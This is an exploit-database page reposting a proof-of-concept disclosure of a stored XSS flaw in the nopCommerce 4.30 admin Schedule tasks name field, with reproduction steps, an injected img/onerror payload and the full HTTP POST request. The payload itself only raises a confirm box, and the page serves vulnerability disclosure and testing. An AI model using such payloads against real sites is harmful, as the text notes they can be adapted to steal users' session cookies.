Advertisement






nopCommerce Store 4.30 Cross Site Scripting

CVE Category Price Severity
CVE-2021-32688 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-11-24
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110198

Below is a copy:

nopCommerce Store 4.30 Cross Site Scripting
# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

Attack vector:
This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Schedule tasks.

Steps-To-Reproduce:
1. Go to the nopCommerce Store admin page.
2. Now go to the System-Schedule tasks option.
3. Now click to on edit button on any task.
4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
5. Now click on Update button.
6. The XSS will be triggered.

POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/Admin/ScheduleTask/List
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: xyz

Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum